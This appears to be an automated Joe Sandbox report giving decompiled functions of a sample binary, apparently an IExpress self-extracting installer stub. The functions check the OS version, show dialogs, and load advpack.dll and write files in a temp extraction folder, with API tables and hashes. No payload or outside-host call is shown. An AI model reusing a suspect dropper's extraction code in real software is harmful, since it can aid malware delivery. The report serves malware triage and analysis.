                                                							_v436 = E00382A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                							_t91 = E00382A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                							_t123 = _v436;
                                                							_t133 = 0x54d;
                                                							__eflags = _t123;
                                                							if(_t123 < 0) {
                                                								L32:
                                                								__eflags = _v420 - 1;
                                                								if(_v420 == 1) {
                                                									_t138 = 0x54c;
                                                									L36:
                                                									__eflags = _t138;
                                                									if(_t138 != 0) {
                                                										L40:
                                                										__eflags = _t138 - _t133;
                                                										if(_t138 == _t133) {
                                                											L30:
                                                											_v420 = _v420 & 0x00000000;
                                                											_t115 = 0;
                                                											_v436 = _v436 & 0x00000000;
                                                											__eflags = _t138 - _t133;
                                                											_t133 = _v432;
                                                											if(__eflags != 0) {
                                                												_t124 = _v440;
                                                											} else {
                                                												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                												_v420 =  &_v268;
                                                											}
                                                											__eflags = _t124;
                                                											if(_t124 == 0) {
                                                												_t135 = _v436;
                                                											} else {
                                                												_t99 = _t124[0x30];
                                                												_t135 = _t124[0x34] + 0x84 + _t133;
                                                												__eflags = _t99 & 0x00000001;
                                                												if((_t99 & 0x00000001) == 0) {
                                                													asm("sbb ebx, ebx");
                                                													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                												} else {
                                                													_t115 = 0x104;
                                                												}
                                                											}
                                                											__eflags =  *0x388a38 & 0x00000001;
                                                											if(( *0x388a38 & 0x00000001) != 0) {
                                                												L64:
                                                												_push(0);
                                                												_push(0x30);
                                                												_push(_v420);
                                                												_push("lega");
                                                												goto L65;
                                                											} else {
                                                												__eflags = _t135;
                                                												if(_t135 == 0) {
                                                													goto L64;
                                                												}
                                                												__eflags =  *_t135;
                                                												if( *_t135 == 0) {
                                                													goto L64;
                                                												}
                                                												MessageBeep(0);
                                                												_t94 = E0038681F(_t115);
                                                												__eflags = _t94;
                                                												if(_t94 == 0) {
                                                													L57:
                                                													0x180030 = 0x30;
                                                													L58:
                                                													_t97 = MessageBoxA(0, _t135, "lega", 0x00180030 | _t115);
                                                													__eflags = _t115 & 0x00000004;
                                                													if((_t115 & 0x00000004) == 0) {
                                                														__eflags = _t115 & 0x00000001;
                                                														if((_t115 & 0x00000001) == 0) {
                                                															goto L66;
                                                														}
                                                														__eflags = _t97 - 1;
                                                														L62:
                                                														if(__eflags == 0) {
                                                															_t138 = 0;
                                                														}
                                                														goto L66;
                                                													}
                                                													__eflags = _t97 - 6;
                                                													goto L62;
                                                												}
                                                												_t98 = E003867C9(_t124, _t124);
                                                												__eflags = _t98;
                                                												if(_t98 == 0) {
                                                													goto L57;
                                                												}
                                                												goto L58;
                                                											}
                                                										}
                                                										__eflags = _t138 - 0x54c;
                                                										if(_t138 == 0x54c) {
                                                											goto L30;
                                                										}
                                                										__eflags = _t138;
                                                										if(_t138 == 0) {
                                                											goto L66;
                                                										}
                                                										_t135 = 0;
                                                										__eflags = 0;
                                                										goto L44;
                                                									}
                                                									L37:
                                                									_t129 = _v432;
                                                									__eflags = _t129[0x7c];
                                                									if(_t129[0x7c] == 0) {
                                                										goto L66;
                                                									}
                                                									_t133 =  &_v268;
                                                									_t104 = E003828E8(_t129,  &_v268, _t129,  &_v428);
                                                									__eflags = _t104;
                                                									if(_t104 != 0) {
                                                										goto L66;
                                                									}
                                                									_t135 = _v428;
                                                									_t133 = 0x54d;
                                                									_t138 = 0x54d;
                                                									goto L40;
                                                								}
                                                								goto L33;
                                                							}
                                                							__eflags = _t91;
                                                							if(_t91 > 0) {
                                                								goto L32;
                                                							}
                                                							__eflags = _t123;
                                                							if(_t123 != 0) {
                                                								__eflags = _t91;
                                                								if(_t91 != 0) {
                                                									goto L37;
                                                								}
                                                								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                								L27:
                                                								if(__eflags <= 0) {
                                                									goto L37;
                                                								}
                                                								L28:
                                                								__eflags = _t135;
                                                								if(_t135 == 0) {
                                                									goto L33;
                                                								}
                                                								_t138 = 0x54c;
                                                								goto L30;
                                                							}
                                                							__eflags = _t91;
                                                							_t107 = _v416.dwBuildNumber;
                                                							if(_t91 != 0) {
                                                								_t131 = _v424;
                                                								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                									goto L37;
                                                								}
                                                								goto L28;
                                                							}
                                                							_t132 = _t107 & 0x0000ffff;
                                                							_t109 = _v424;
                                                							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                								goto L28;
                                                							}
                                                							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                							goto L27;
                                                							L33:
                                                							_t135 =  &(_t135[1]);
                                                							_v428 = _t135;
                                                							_v420 = _t135;
                                                							__eflags = _t135 - 2;
                                                						} while (_t135 < 2);
                                                						goto L36;
                                                					}
                                                					__eflags = _t77 == 1;
                                                					if(_t77 == 1) {
                                                						 *0x389a40 = _t119;
                                                						 *0x388184 = 1;
                                                						 *0x388180 = 1;
                                                						__eflags = _t133 - 3;
                                                						if(_t133 > 3) {
                                                							__eflags = _t133 - 5;
                                                							if(_t133 < 5) {
                                                								goto L14;
                                                							}
                                                							_t113 = 3;
                                                							_t119 = _t113;
                                                							goto L13;
                                                						}
                                                						_t119 = 1;
                                                						_t114 = 3;
                                                						 *0x389a40 = 1;
                                                						__eflags = _t133 - _t114;
                                                						if(__eflags < 0) {
                                                							L9:
                                                							 *0x388184 = _t135;
                                                							 *0x388180 = _t135;
                                                							goto L14;
                                                						}
                                                						if(__eflags != 0) {
                                                							goto L14;
                                                						}
                                                						__eflags = _v416.dwMinorVersion - 0x33;
                                                						if(_v416.dwMinorVersion >= 0x33) {
                                                							goto L14;
                                                						}
                                                						goto L9;
                                                					}
                                                					_t138 = 0x4ca;
                                                					goto L44;
                                                				} else {
                                                					_t138 = 0x4b4;
                                                					L44:
                                                					_push(_t135);
                                                					_push(0x10);
                                                					_push(_t135);
                                                					_push(_t135);
                                                					L65:
                                                					_t133 = _t138;
                                                					E003844B9(0, _t138);
                                                					L66:
                                                					return E00386CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                				}
                                                			}





































                                                0x003836f9
                                                0x00383700
                                                0x0038370c
                                                0x00383716
                                                0x00383718
                                                0x0038371b
                                                0x00383721
                                                0x0038372b
                                                0x0038373d
                                                0x00383745
                                                0x00383746
                                                0x00383746
                                                0x00383749
                                                0x003837ab
                                                0x003837ad
                                                0x003837ae
                                                0x003837b3
                                                0x003837b8
                                                0x003837b8
                                                0x003837bf
                                                0x003837bf
                                                0x003837c5
                                                0x00000000
                                                0x00000000
                                                0x003837cb
                                                0x003837cd
                                                0x00000000
                                                0x00000000
                                                0x003837d5
                                                0x003837db
                                                0x003837e8
                                                0x003837ea
                                                0x003837ea
                                                0x003837ea
                                                0x003837f0
                                                0x003837f6
                                                0x00383805
                                                0x00383817
                                                0x0038382b
                                                0x00383830
                                                0x00383836
                                                0x0038383b
                                                0x0038383d
                                                0x003838eb
                                                0x003838eb
                                                0x003838f2
                                                0x0038390c
                                                0x00383911
                                                0x00383911
                                                0x00383913
                                                0x0038394d
                                                0x0038394d
                                                0x0038394f
                                                0x003838a9
                                                0x003838a9
                                                0x003838b0
                                                0x003838b2
                                                0x003838b9
                                                0x003838bb
                                                0x003838c1
                                                0x00383975
                                                0x003838c7
                                                0x003838de
                                                0x003838e0
                                                0x003838e0
                                                0x0038397b
                                                0x0038397d
                                                0x003839a9
                                                0x0038397f
                                                0x00383982
                                                0x0038398b
                                                0x0038398d
                                                0x0038398f
                                                0x0038399f
                                                0x003839a1
                                                0x00383991
                                                0x00383991
                                                0x00383991
                                                0x0038398f
                                                0x003839af
                                                0x003839b6
                                                0x00383a0f
                                                0x00383a0f
                                                0x00383a11
                                                0x00383a13
                                                0x00383a19
                                                0x00000000
                                                0x003839b8
                                                0x003839b8
                                                0x003839ba
                                                0x00000000
                                                0x00000000
                                                0x003839bc
                                                0x003839bf
                                                0x00000000
                                                0x00000000
                                                0x003839c3
                                                0x003839c9
                                                0x003839ce
                                                0x003839d0
                                                0x003839e3
                                                0x003839e5
                                                0x003839e6
                                                0x003839f1
                                                0x003839f7
                                                0x003839fa
                                                0x00383a01
                                                0x00383a04
                                                0x00000000
                                                0x00000000
                                                0x00383a06
                                                0x00383a09
                                                0x00383a09
                                                0x00383a0b
                                                0x00383a0b
                                                0x00000000
                                                0x00383a09
                                                0x003839fc
                                                0x00000000
                                                0x003839fc
                                                0x003839d3
                                                0x003839d8
                                                0x003839da
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x003839dc
                                                0x003839b6
                                                0x00383955
                                                0x0038395b
                                                0x00000000
                                                0x00000000
                                                0x00383961
                                                0x00383963
                                                0x00000000
                                                0x00000000
                                                0x00383969
                                                0x00383969
                                                0x00000000
                                                0x00383969
                                                0x00383915
                                                0x00383915
                                                0x0038391b
                                                0x0038391f
                                                0x00000000
                                                0x00000000
                                                0x0038392d
                                                0x00383933
                                                0x00383938
                                                0x0038393a
                                                0x00000000
                                                0x00000000
                                                0x00383940
                                                0x00383946
                                                0x0038394b
                                                0x00000000
                                                0x0038394b
                                                0x00000000
                                                0x003838f2
                                                0x00383843
                                                0x00383845
                                                0x00000000
                                                0x00000000
                                                0x0038384b
                                                0x0038384d
                                                0x00383883
                                                0x00383885
                                                0x00000000
                                                0x00000000
                                                0x0038389a
                                                0x0038389e
                                                0x0038389e
                                                0x00000000
                                                0x00000000
                                                0x003838a0
                                                0x003838a0
                                                0x003838a2
                                                0x00000000
                                                0x00000000
                                                0x003838a4
                                                0x00000000
                                                0x003838a4
                                                0x0038384f
                                                0x00383851
                                                0x00383857
                                                0x0038386e
                                                0x00383877
                                                0x0038387b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00383881
                                                0x00383859
                                                0x0038385c
                                                0x00383862
                                                0x00383866
                                                0x00000000
                                                0x00000000
                                                0x00383868
                                                0x00000000
                                                0x003838f4
                                                0x003838f4
                                                0x003838f5
                                                0x003838fb
                                                0x00383901
                                                0x00383901
                                                0x00000000
                                                0x0038390a
                                                0x0038374b
                                                0x0038374e
                                                0x0038375c
                                                0x00383764
                                                0x00383769
                                                0x0038376e
                                                0x00383771
                                                0x0038379c
                                                0x0038379f
                                                0x00000000
                                                0x00000000
                                                0x003837a3
                                                0x003837a4
                                                0x00000000
                                                0x003837a4
                                                0x00383773
                                                0x00383777
                                                0x00383778
                                                0x0038377f
                                                0x00383781
                                                0x0038378e
                                                0x0038378e
                                                0x00383794
                                                0x00000000
                                                0x00383794
                                                0x00383783
                                                0x00000000
                                                0x00000000
                                                0x00383785
                                                0x0038378c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0038378c
                                                0x00383750
                                                0x00000000
                                                0x0038372d
                                                0x0038372d
                                                0x0038396b
                                                0x0038396b
                                                0x0038396c
                                                0x0038396e
                                                0x0038396f
                                                0x00383a1e
                                                0x00383a1e
                                                0x00383a22
                                                0x00383a27
                                                0x00383a3e
                                                0x00383a3e

                                                APIs
                                                • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00383723
                                                • MessageBeep.USER32(00000000), ref: 003839C3
                                                • MessageBoxA.USER32(00000000,00000000,lega,00000030), ref: 003839F1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: Message$BeepVersion
                                                • String ID: 3$lega
                                                • API String ID: 2519184315-680046778
                                                • Opcode ID: 88bff3ab5e97c50a9d7e6c1d42597606f34f1ee3c8afc202a77d5835c45e1e72
                                                • Instruction ID: 90e8d4ea7dd9ee16e17fec02d4cbc40bf0de05a657f56a6822f37a6405c2d1b6
                                                • Opcode Fuzzy Hash: 88bff3ab5e97c50a9d7e6c1d42597606f34f1ee3c8afc202a77d5835c45e1e72
                                                • Instruction Fuzzy Hash: 7491C471A013149BEB3BAF25CC91BEA77A5EB45B04F1600E9D8899B351DB748F81CB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 78%
                                                			E00386517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, char _a16) {
                                                				struct HRSRC__* _t6;
                                                				void* _t21;
                                                				struct HINSTANCE__* _t23;
                                                				int _t24;
                                                
                                                				_t23 =  *0x389a3c; // 0x380000
                                                				_t6 = FindResourceA(_t23, __edx, 5);
                                                				if(_t6 == 0) {
                                                					L6:
                                                					E003844B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                					_t5 =  &_a16; // 0x382ee8
                                                					_t24 =  *_t5;
                                                				} else {
                                                					_t21 = LoadResource(_t23, _t6);
                                                					if(_t21 == 0) {
                                                						goto L6;
                                                					} else {
                                                						if(_a12 != 0) {
                                                							_push(_a12);
                                                						} else {
                                                							_push(0);
                                                						}
                                                						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                						FreeResource(_t21);
                                                						if(_t24 == 0xffffffff) {
                                                							goto L6;
                                                						}
                                                					}
                                                				}
                                                				return _t24;
                                                			}







                                                0x0038651f
                                                0x0038652a
                                                0x00386534
                                                0x0038656b
                                                0x00386577
                                                0x0038657c
                                                0x0038657c
                                                0x00386536
                                                0x0038653e
                                                0x00386542
                                                0x00000000
                                                0x00386544
                                                0x00386547
                                                0x0038654c
                                                0x00386549
                                                0x00386549
                                                0x00386549
                                                0x0038655e
                                                0x00386560
                                                0x00386569
                                                0x00000000
                                                0x00000000
                                                0x00386569
                                                0x00386542
                                                0x00386587

                                                APIs
                                                • FindResourceA.KERNEL32(00380000,000007D6,00000005), ref: 0038652A
                                                • LoadResource.KERNEL32(00380000,00000000,?,?,00382EE8,00000000,003819E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00386538
                                                • DialogBoxIndirectParamA.USER32(00380000,00000000,00000547,003819E0,00000000), ref: 00386557
                                                • FreeResource.KERNEL32(00000000,?,?,00382EE8,00000000,003819E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00386560
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                • String ID: .8
                                                • API String ID: 1214682469-3342083374
                                                • Opcode ID: 73ab98e342ed0afd499826a0b7914a1b52da31f04ffd58eb05cf4486afaafd05
                                                • Instruction ID: 5a9b6fea4256dc1d32ceef73e0f98f2cf3c70df3005bf5b896a3a04c828e7326
                                                • Opcode Fuzzy Hash: 73ab98e342ed0afd499826a0b7914a1b52da31f04ffd58eb05cf4486afaafd05
                                                • Instruction Fuzzy Hash: C10149B2100709BBDB126FA99C09EBB7B6DEB8A760F0101A6FE00A3190D775CD10C7A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 83%
                                                			E00386495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                				signed int _v8;
                                                				char _v268;
                                                				void* __edi;
                                                				signed int _t9;
                                                				signed char _t14;
                                                				struct HINSTANCE__* _t15;
                                                				void* _t18;
                                                				CHAR* _t26;
                                                				void* _t27;
                                                				signed int _t28;
                                                
                                                				_t27 = __esi;
                                                				_t18 = __ebx;
                                                				_t9 =  *0x388004; // 0xb25159a8
                                                				_v8 = _t9 ^ _t28;
                                                				_push(__ecx);
                                                				E00381781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
                                                				_t26 = "advpack.dll";
                                                				E0038658A( &_v268, 0x104, _t26);
                                                				_t14 = GetFileAttributesA( &_v268);
                                                				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                					_t15 = LoadLibraryA(_t26);
                                                				} else {
                                                					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                				}
                                                				return E00386CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                			}













                                                0x00386495
                                                0x00386495
                                                0x003864a0
                                                0x003864a7
                                                0x003864ab
                                                0x003864bd
                                                0x003864c2
                                                0x003864d3
                                                0x003864df
                                                0x003864e8
                                                0x00386502
                                                0x003864ee
                                                0x003864f9
                                                0x003864f9
                                                0x00386516

                                                APIs
                                                • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 003864DF
                                                • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 003864F9
                                                • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00386502
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: LibraryLoad$AttributesFile
                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                                • API String ID: 438848745-2381869747
                                                • Opcode ID: 22b898cce70276e9d5c1e3bf47ea875c2eab6bdf862b6671a0569ddd3fbc6be6
                                                • Instruction ID: 4bdf6506aed1a6e7961d5556fd5f3a0d9fafdb5e9790c112d97161fc7e040a4d
                                                • Opcode Fuzzy Hash: 22b898cce70276e9d5c1e3bf47ea875c2eab6bdf862b6671a0569ddd3fbc6be6
                                                • Instruction Fuzzy Hash: EF01D670504308ABDB11FB64DC4AAEE737CDB51311F5001D5F585961C0DF709E868B52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 32%
                                                			E00384169(void* __eflags) {
                                                				int _t18;
                                                				void* _t21;
                                                
                                                				_t20 = E0038468F("FINISHMSG", 0, 0);
                                                				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                				if(_t21 != 0) {
                                                					if(E0038468F("FINISHMSG", _t21, _t20) != 0) {
                                                						if(lstrcmpA(_t21, "<None>") == 0) {
                                                							L7:
                                                							return LocalFree(_t21);
                                                						}
                                                						_push(0);
                                                						_push(0x40);
                                                						_push(0);
                                                						_push(_t21);
                                                						_t18 = 0x3e9;
                                                						L6:
                                                						E003844B9(0, _t18);
                                                						goto L7;
                                                					}
                                                					_push(0);
                                                					_push(0x10);
                                                					_push(0);
                                                					_push(0);
                                                					_t18 = 0x4b1;
                                                					goto L6;
                                                				}
                                                				return E003844B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                			}





                                                0x0038417d
                                                0x0038418f
                                                0x00384193
                                                0x003841b7
                                                0x003841d3
                                                0x003841e6
                                                0x00000000
                                                0x003841e7
                                                0x003841d5
                                                0x003841d6
                                                0x003841d8
                                                0x003841d9
                                                0x003841da
                                                0x003841df
                                                0x003841e1
                                                0x00000000
                                                0x003841e1
                                                0x003841b9
                                                0x003841ba
                                                0x003841bc
                                                0x003841bd
                                                0x003841be
                                                0x00000000
                                                0x003841be
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 0038468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003846A0
                                                  • Part of subcall function 0038468F: SizeofResource.KERNEL32(00000000,00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846A9
                                                  • Part of subcall function 0038468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003846C3
                                                  • Part of subcall function 0038468F: LoadResource.KERNEL32(00000000,00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846CC
                                                  • Part of subcall function 0038468F: LockResource.KERNEL32(00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846D3
                                                  • Part of subcall function 0038468F: memcpy_s.MSVCRT ref: 003846E5
                                                  • Part of subcall function 0038468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003846EF
                                                • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,003830B4), ref: 00384189
                                                • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,003830B4), ref: 003841E7
                                                  • Part of subcall function 003844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00384518
                                                  • Part of subcall function 003844B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 00384554
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                • String ID: <None>$FINISHMSG
                                                • API String ID: 3507850446-3091758298
                                                • Opcode ID: 6601badf33315ac30ddf253c3ba86b405117e8502ab6a98a22fb0a3c6e6a8c94
                                                • Instruction ID: ff965c804a5543832f63debba7129a537ab8dae4100e47f87192a391d5706817
                                                • Opcode Fuzzy Hash: 6601badf33315ac30ddf253c3ba86b405117e8502ab6a98a22fb0a3c6e6a8c94
                                                • Instruction Fuzzy Hash: AC01F4F53003167BF72736664C8AF7B618EDBD4795F1140E6B705E6980DAA8DC014375
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 93%
                                                			E003819E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                				signed int _v8;
                                                				char _v520;
                                                				void* __esi;
                                                				signed int _t11;
                                                				void* _t14;
                                                				void* _t23;
                                                				void* _t27;
                                                				void* _t33;
                                                				struct HWND__* _t34;
                                                				signed int _t35;
                                                
                                                				_t33 = __edi;
                                                				_t27 = __ebx;
                                                				_t11 =  *0x388004; // 0xb25159a8
                                                				_v8 = _t11 ^ _t35;
                                                				_t34 = _a4;
                                                				_t14 = _a8 - 0x110;
                                                				if(_t14 == 0) {
                                                					_t32 = GetDesktopWindow();
                                                					E003843D0(_t34, _t15);
                                                					_v520 = 0;
                                                					LoadStringA( *0x389a3c, _a16,  &_v520, 0x200);
                                                					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                					MessageBeep(0xffffffff);
                                                					goto L6;
                                                				} else {
                                                					if(_t14 != 1) {
                                                						L4:
                                                						_t23 = 0;
                                                					} else {
                                                						_t32 = _a12;
                                                						if(_t32 - 0x83d > 1) {
                                                							goto L4;
                                                						} else {
                                                							EndDialog(_t34, _t32);
                                                							L6:
                                                							_t23 = 1;
                                                						}
                                                					}
                                                				}
                                                				return E00386CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                			}













                                                0x003819e0
                                                0x003819e0
                                                0x003819eb
                                                0x003819f2
                                                0x003819f9
                                                0x003819fc
                                                0x00381a01
                                                0x00381a2a
                                                0x00381a2e
                                                0x00381a3e
                                                0x00381a4f
                                                0x00381a62
                                                0x00381a6a
                                                0x00000000
                                                0x00381a03
                                                0x00381a06
                                                0x00381a20
                                                0x00381a20
                                                0x00381a08
                                                0x00381a08
                                                0x00381a14
                                                0x00000000
                                                0x00381a16
                                                0x00381a18
                                                0x00381a70
                                                0x00381a72
                                                0x00381a72
                                                0x00381a14
                                                0x00381a06
                                                0x00381a81

                                                APIs
                                                • EndDialog.USER32(?,?), ref: 00381A18
                                                • GetDesktopWindow.USER32 ref: 00381A24
                                                • LoadStringA.USER32(?,?,00000200), ref: 00381A4F
                                                • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00381A62
                                                • MessageBeep.USER32(000000FF), ref: 00381A6A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                • String ID:
                                                • API String ID: 1273765764-0
                                                • Opcode ID: 6e52480ebdaef75c18ab98e35d8f8d8516500e705141f7b35458128a074081ce
                                                • Instruction ID: abacced45a9de4864d1681424b656985a5fd46e8658b5d345de12f547059edd9
                                                • Opcode Fuzzy Hash: 6e52480ebdaef75c18ab98e35d8f8d8516500e705141f7b35458128a074081ce
                                                • Instruction Fuzzy Hash: 3E11E131500309AFDB06EF64DD4CAAE77BCEF49300F0081D1F91296190DB349E11CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 88%
                                                			E003863C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                				signed int _v8;
                                                				char _v268;
                                                				long _v272;
                                                				void* _v276;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t15;
                                                				long _t28;
                                                				struct _OVERLAPPED* _t37;
                                                				void* _t39;
                                                				signed int _t40;
                                                
                                                				_t15 =  *0x388004; // 0xb25159a8
                                                				_v8 = _t15 ^ _t40;
                                                				_v272 = _v272 & 0x00000000;
                                                				_push(__ecx);
                                                				_v276 = _a16;
                                                				_t37 = 1;
                                                				E00381781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
                                                				E0038658A( &_v268, 0x104, _a12);
                                                				_t28 = 0;
                                                				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                				if(_t39 != 0xffffffff) {
                                                					_t28 = _a4;
                                                					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                						 *0x389124 = 0x80070052;
                                                						_t37 = 0;
                                                					}
                                                					CloseHandle(_t39);
                                                				} else {
                                                					 *0x389124 = 0x80070052;
                                                					_t37 = 0;
                                                				}
                                                				return E00386CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                			}















                                                0x003863cb
                                                0x003863d2
                                                0x003863d8
                                                0x003863ea
                                                0x003863f3
                                                0x00386401
                                                0x00386402
                                                0x00386410
                                                0x00386415
                                                0x00386433
                                                0x00386438
                                                0x00386449
                                                0x00386463
                                                0x0038646d
                                                0x00386477
                                                0x00386477
                                                0x0038647a
                                                0x0038643a
                                                0x0038643a
                                                0x00386444
                                                0x00386444
                                                0x00386492

                                                APIs
                                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0038642D
                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0038645B
